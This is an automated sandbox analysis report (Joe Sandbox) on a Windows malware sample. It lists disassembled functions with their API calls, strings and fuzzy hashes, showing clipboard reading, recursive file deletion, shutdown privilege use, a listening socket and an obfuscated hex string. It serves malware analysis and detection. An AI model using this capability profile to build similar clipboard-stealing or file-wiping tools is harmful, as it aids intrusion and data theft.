HeapFree.KERNEL32(00000000), ref: 004C0D7F

Part of subcall function 004C1193: GetProcessHeap.KERNEL32(00000008,004C0BB1,?,00000000,?,004C0BB1,?), ref: 004C11A1
Part of subcall function 004C1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004C0BB1,?), ref: 004C11A8
Part of subcall function 004C1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004C0BB1,?), ref: 004C11B7

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: b7072d46315bb1203470d0bc23c71375a4495d7e869dd3c45bbdd831a7517384
Instruction ID: 021d851e8c347ce3aa98ca3fd394ca952e89c1abd72ae850f30e6e79bdfee9d1
Opcode Fuzzy Hash: b7072d46315bb1203470d0bc23c71375a4495d7e869dd3c45bbdd831a7517384
Instruction Fuzzy Hash: 25719C7590020AEFDF50DFE4DD84FAFBBB8BF04700F04452AE915A6291DB78A915CB64

Function 004DEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(004FCC08), ref: 004DEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 004DEB37
GetClipboardData.USER32(0000000D), ref: 004DEB43
CloseClipboard.USER32 ref: 004DEB4F
GlobalLock.KERNEL32(00000000), ref: 004DEB87
CloseClipboard.USER32 ref: 004DEB91
GlobalUnlock.KERNEL32(00000000), ref: 004DEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 004DEBC9
GetClipboardData.USER32(00000001), ref: 004DEBD1
GlobalLock.KERNEL32(00000000), ref: 004DEBE2
GlobalUnlock.KERNEL32(00000000), ref: 004DEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 004DEC38
GetClipboardData.USER32(0000000F), ref: 004DEC44
GlobalLock.KERNEL32(00000000), ref: 004DEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 004DEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004DEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004DECD2
GlobalUnlock.KERNEL32(00000000), ref: 004DECF3
CountClipboardFormats.USER32 ref: 004DED14
CloseClipboard.USER32 ref: 004DED59

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 0e5cd2837b66bb5a15c0ee832e46f8798957f585ea0aa4fd6c73c9b3143075bc
Instruction ID: e99fdc6f84072271e3ea83dc682fab0e993e8b8df977de0e074f90e05f9f0c68
Opcode Fuzzy Hash: 0e5cd2837b66bb5a15c0ee832e46f8798957f585ea0aa4fd6c73c9b3143075bc
Instruction Fuzzy Hash: A761B2342042069FD300EF22C998F3A77A5AF84704F14455FF4569B3A1DB75ED0ACB6A

Function 004D698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004D69BE
FindClose.KERNEL32(00000000), ref: 004D6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004D6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004D6A75

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 004D6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 004D6ADF

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 004D6B32
%4d%02d%02d%02d%02d%02d, xrefs: 004D6B6A
%4d, xrefs: 004D6BB1
%02d, xrefs: 004D6C00, 004D6C0A, 004D6C5A, 004D6CAA, 004D6CFA, 004D6D4A
%03d, xrefs: 004D6DA2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 0e6b7cb1bb36e3f02c137c23ad05ea170bdfa2d610141bc29e263bba0b3ad620
Instruction ID: a85964ddc7b9dd35d4c1ce8069c26ce0eee5652d4edb47bdad02daa1ba82fe5f
Opcode Fuzzy Hash: 0e6b7cb1bb36e3f02c137c23ad05ea170bdfa2d610141bc29e263bba0b3ad620
Instruction Fuzzy Hash: 43D15171508340AEC314EBA5C991EABB7ECAF88708F04491EF589C7291EB78DA44C767

Function 004D9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 004D9663
GetFileAttributesW.KERNEL32(?), ref: 004D96A1
SetFileAttributesW.KERNEL32(?,?), ref: 004D96BB
FindNextFileW.KERNEL32(00000000,?), ref: 004D96D3
FindClose.KERNEL32(00000000), ref: 004D96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 004D96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 004D974A
SetCurrentDirectoryW.KERNEL32(00526B7C), ref: 004D9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 004D9772
FindClose.KERNEL32(00000000), ref: 004D977F
FindClose.KERNEL32(00000000), ref: 004D978F

Strings

*.*, xrefs: 004D96F5

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: dff0735a7fdb9d37519ab5e1e669383783c80277050f518d710491f5e1d17f5b
Instruction ID: f456652a1e1635c64a801c84279aa8f5ca33cec1e74a100a6db9ef2c27d9320f
Opcode Fuzzy Hash: dff0735a7fdb9d37519ab5e1e669383783c80277050f518d710491f5e1d17f5b
Instruction Fuzzy Hash: 9031C33254021DAADF14AFB4ED58AEF77ACAF09320F1041A7F805E22A0DB38DD44CB18

Function 004D979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 004D97BE
FindNextFileW.KERNEL32(00000000,?), ref: 004D9819
FindClose.KERNEL32(00000000), ref: 004D9824
FindFirstFileW.KERNEL32(*.*,?), ref: 004D9840
SetCurrentDirectoryW.KERNEL32(?), ref: 004D9890
SetCurrentDirectoryW.KERNEL32(00526B7C), ref: 004D98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004D98B8
FindClose.KERNEL32(00000000), ref: 004D98C5
FindClose.KERNEL32(00000000), ref: 004D98D5

Part of subcall function 004CDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004CDB00

Strings

*.*, xrefs: 004D983B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: ab18fc937e2c8cd69cad55fb9ee69455c390a3a2a0fcd2697748f664dad5f6fb
Instruction ID: deb6d4ba743a188ce503c1306f24d7f72c1528f2bb340129288c42f4e07417e7
Opcode Fuzzy Hash: ab18fc937e2c8cd69cad55fb9ee69455c390a3a2a0fcd2697748f664dad5f6fb
Instruction Fuzzy Hash: 3231B53254021D6ADF14BFA5EC58AEF77ACAF06724F1441A7F810E22A0DB38DD55DB18

Function 004D8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004D8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 004D8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004D8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004D8310
SetCurrentDirectoryW.KERNEL32(?), ref: 004D8324
SetCurrentDirectoryW.KERNEL32(?), ref: 004D8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004D838C
SetCurrentDirectoryW.KERNEL32(?), ref: 004D8395

Strings

*.*, xrefs: 004D839B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 57faff1d7f65c8011aa549e568a21d213add0bdf39f53a1530d6c216f5eae079
Instruction ID: 131127eac71dd239b80cd6a8e293f5aba499f799f39302543883d51a49342f72
Opcode Fuzzy Hash: 57faff1d7f65c8011aa549e568a21d213add0bdf39f53a1530d6c216f5eae079
Instruction Fuzzy Hash: 76616B725042459FC710EF65C8509AEB3E8FF89318F04496FF98983251EB39E945CB9A

Function 004CD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00463AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00463A97,?,?,00462E7F,?,?,?,00000000), ref: 00463AC2

Part of subcall function 004CE199: GetFileAttributesW.KERNEL32(?,004CCF95), ref: 004CE19A

FindFirstFileW.KERNEL32(?,?), ref: 004CD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004CD1DD
MoveFileW.KERNEL32(?,?), ref: 004CD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 004CD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 004CD237

Part of subcall function 004CD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004CD21C,?,?), ref: 004CD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 004CD253
FindClose.KERNEL32(00000000), ref: 004CD264

Strings

\*.*, xrefs: 004CD0CD, 004CD0D6, 004CD0EB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 23f52c582205654b80a0de9695b77d555632d260d0dfb24d7648910c392ac548
Instruction ID: 1d51d9e8e1f95c8dced87c183078fe3a56fde0afcbb187c7f868f3e89dcf41ef
Opcode Fuzzy Hash: 23f52c582205654b80a0de9695b77d555632d260d0dfb24d7648910c392ac548
Instruction Fuzzy Hash: 82617D35C0110D9ACF05EBE1CA92EEEB7B9AF15304F2440AEE40173291EB385F09DB69

Function 004DED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004DED91
EmptyClipboard.USER32 ref: 004DED97
GlobalAlloc.KERNEL32(00000002,?), ref: 004DEDAC
CloseClipboard.USER32 ref: 004DEEA3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: f29428846713a1c7c048f9d16c0074a1677b6631081094914abe962e9d934758
Instruction ID: 8b2638a09004486adf036b75e85b4f02b5985aa97bea110048ae5bea59ddaa42
Opcode Fuzzy Hash: f29428846713a1c7c048f9d16c0074a1677b6631081094914abe962e9d934758
Instruction Fuzzy Hash: D5418E35604611EFE710DF16D898B2ABBE1EF44318F14809AE4558F762C779EC42CB99

Function 004CE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004C16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004C170D
Part of subcall function 004C16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004C173A
Part of subcall function 004C16C3: GetLastError.KERNEL32 ref: 004C174A

ExitWindowsEx.USER32(?,00000000), ref: 004CE932

Strings

, xrefs: 004CE95C
SeShutdownPrivilege, xrefs: 004CE902
, xrefs: 004CE920
@, xrefs: 004CE925

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 8b37ce26467f137e277e011ee8f087f9838602424af3b9bb1e920b31bcd4fc55
Instruction ID: 2ab47ac281bb3950460aad39332907001fe159ef7785ff1665a1b40348ff13c7
Opcode Fuzzy Hash: 8b37ce26467f137e277e011ee8f087f9838602424af3b9bb1e920b31bcd4fc55
Instruction Fuzzy Hash: 62012BB6610214EBEBD422B69CC6FBF725CA705744F15052BF802E21E2D7785C40829C

Function 004E1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 004E1276
WSAGetLastError.WSOCK32 ref: 004E1283
bind.WSOCK32(00000000,?,00000010), ref: 004E12BA
WSAGetLastError.WSOCK32 ref: 004E12C5
closesocket.WSOCK32(00000000), ref: 004E12F4
listen.WSOCK32(00000000,00000005), ref: 004E1303
WSAGetLastError.WSOCK32 ref: 004E130D
closesocket.WSOCK32(00000000), ref: 004E133C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 38cb043dd6d52517378fb3de38598a0c15e3e13007774d57edb6ffe09136c12a
Instruction ID: 0194ed12dca3f4a5622457adac74c39adaaf93d010392ae87e993630f5222dd0
Opcode Fuzzy Hash: 38cb043dd6d52517378fb3de38598a0c15e3e13007774d57edb6ffe09136c12a
Instruction Fuzzy Hash: 8941A030A001409FD710EF65C9C8B6ABBE5AF46319F188099D9569F3A2C775EC81CBE5

Function 0049B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0049B9D4
_free.LIBCMT ref: 0049B9F8
_free.LIBCMT ref: 0049BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00503700), ref: 0049BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0053121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0049BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00531270,000000FF,?,0000003F,00000000,?), ref: 0049BC36
_free.LIBCMT ref: 0049BD4B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: a541074e2bc844e9f36cb3ea962432ce9f60ec856ea4df8df9830ce8ff7f9a2f
Instruction ID: 02078b1d8eb6e2186729c7489d553f13f6f489de8c3a42d823c42e43fa78ff65
Opcode Fuzzy Hash: a541074e2bc844e9f36cb3ea962432ce9f60ec856ea4df8df9830ce8ff7f9a2f
Instruction Fuzzy Hash: 27C1F471904208AACF20DF7AAA41AAF7FA9EF51314F1441BFE89497395D7389E0187D8

Function 004CD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00463AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00463A97,?,?,00462E7F,?,?,?,00000000), ref: 00463AC2

Part of subcall function 004CE199: GetFileAttributesW.KERNEL32(?,004CCF95), ref: 004CE19A

FindFirstFileW.KERNEL32(?,?), ref: 004CD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 004CD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 004CD481
FindClose.KERNEL32(00000000), ref: 004CD498
FindClose.KERNEL32(00000000), ref: 004CD4A1

Strings

\*.*, xrefs: 004CD3F2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 82fd9dd815966e166dadfdf25ea9bba4229f61ed6d58df502acdc6a529356e5c
Instruction ID: ddec01699cb55efb916247eff4f44e4096d7db27234b322fc622d4939745a3d3
Opcode Fuzzy Hash: 82fd9dd815966e166dadfdf25ea9bba4229f61ed6d58df502acdc6a529356e5c
Instruction Fuzzy Hash: 1731A2714083459BC304EF61D9919AF77E8BE91308F444E2EF4D553291EB38AA19CB6B

Function 0049E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0049E645

Strings

1#IND, xrefs: 0049F83D
1#SNAN, xrefs: 0049F844
1#INF, xrefs: 0049F852
1#QNAN, xrefs: 0049F84B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 402af4c569e93474b4220457887b594009618f0a87b9d32afadd0cc4a3dab291
Instruction ID: 6230647d9c337619eb6b7952d45743a8437c39603f8753d719e87c44b87c66f5
Opcode Fuzzy Hash: 402af4c569e93474b4220457887b594009618f0a87b9d32afadd0cc4a3dab291
Instruction Fuzzy Hash: 5BC24671E086288BDF25DE299D407EABBB5EB48304F1441FBD80DE7241E778AE858F45

Function 00468060 Relevance: 9.9, Strings: 7, Instructions: 1151COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 004A5DB2
VUUU, xrefs: 004683E8
ERCP, xrefs: 0046813C
6dycwadycw0dycw0dycw8dycwbdycw4dycw5dycwfdycw8dycw5dycw0dycw8dycw1dycwedycwcdycwcdycw0dycw0dycw0dycw0dycw0dycw0dycw0dycwbdycw9dycw, xrefs: 004A5D0F
VUUU, xrefs: 004683FA
VUUU, xrefs: 0046843C
VUUU, xrefs: 004A5DF0

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: 6dycwadycw0dycw0dycw8dycwbdycw4dycw5dycwfdycw8dycw5dycw0dycw8dycw1dycwedycwcdycwcdycw0dycw0dycw0dycw0dycw0dycw0dycw0dycwbdycw9dycw$ERCP$InitializeCriticalSectionEx$VUUU$VUUU$VUUU$VUUU
API String ID: 0-2623763374
Opcode ID: 9dc7390e9ea13ce2f3bb254c96076f426d1b27b0b9b20aea3e897b7f0c8df7b8
Instruction ID: e043f0576a09b7bc177aae575f5ae311b3a8e73ee6ccaa6c9303f3dd1b3d2c19
Opcode Fuzzy Hash: 9dc7390e9ea13ce2f3bb254c96076f426d1b27b0b9b20aea3e897b7f0c8df7b8
Instruction Fuzzy Hash: 63A29271E0021ACBDF24CF58C9407AEB7B1BF65314F25829BD815A7384EB389D81CB5A

Function 004D648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004D64DC
CoInitialize.OLE32(00000000), ref: 004D6639
CoCreateInstance.OLE32(004FFCF8,00000000,00000001,004FFB68,?), ref: 004D6650
CoUninitialize.OLE32 ref: 004D68D4

Strings

.lnk, xrefs: 004D64BA, 004D6524, 004D65E0

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 7def6e3cd7453919cdeb1015b7067cca1df2de78dd5c866c38ba1f5db8f091a9
Instruction ID: 5ecf8626b901c498282432a40059f9aa2d46d229ab394257353a7907bbfaa7d1
Opcode Fuzzy Hash: 7def6e3cd7453919cdeb1015b7067cca1df2de78dd5c866c38ba1f5db8f091a9
